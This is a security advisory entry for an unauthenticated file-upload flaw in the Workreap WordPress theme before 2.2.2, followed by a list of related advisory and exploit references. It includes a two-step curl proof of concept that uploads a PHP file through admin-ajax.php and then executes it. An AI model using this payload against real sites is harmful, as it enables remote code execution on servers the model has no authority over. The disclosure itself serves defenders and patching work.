Lucene search
Harald Eilertsen (Jetpack)WPEX-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CBHistoryJul 02, 2021 - 12:00 a.m.
Workreap < 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
2021-07-0200:00:00
Harald Eilertsen (Jetpack)
99
The theme’s AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
% curl -F 'action=workreap_award_temp_file_uploader' -F [email protected] 'http://example.com/wp-admin/admin-ajax.php'
{"type":"success","message":"File uploaded!","thumbnail":"http:\/\/example.com\/wp-content\/uploads\/workreap-temp\/malicious.php","name":"malicious.php","size":"24.00 B"}
% curl 'http://example.com/wp-content/uploads/workreap-temp/malicious.php'
PWNED!Related
attackerkb
attackerkb
CVE-2021-24499
2021-08-09 00:00:00
patchstack
patchstack
githubexploit
githubexploit
checkpoint_advisories
checkpoint_advisories
WordPress Workreap Theme Remote Code Execution (CVE-2021-24499)
2021-11-28 00:00:00
packetstorm
packetstorm
WordPress Workreap 2.2.2 Shell Upload
2023-06-12 00:00:00
nuclei
nuclei
WordPress Workreap - Remote Code Execution
2021-09-16 01:07:40
cve
cve
CVE-2021-24499
2021-08-09 10:15:00
prion
prion
Design/Logic Flaw
2021-08-09 10:15:00
wpvulndb
wpvulndb
Workreap < 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
2021-07-02 00:00:00
zdt
zdt
WordPress Workreap 2.2.2 Shell Upload Exploit
2023-06-12 00:00:00
Related for WPEX-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB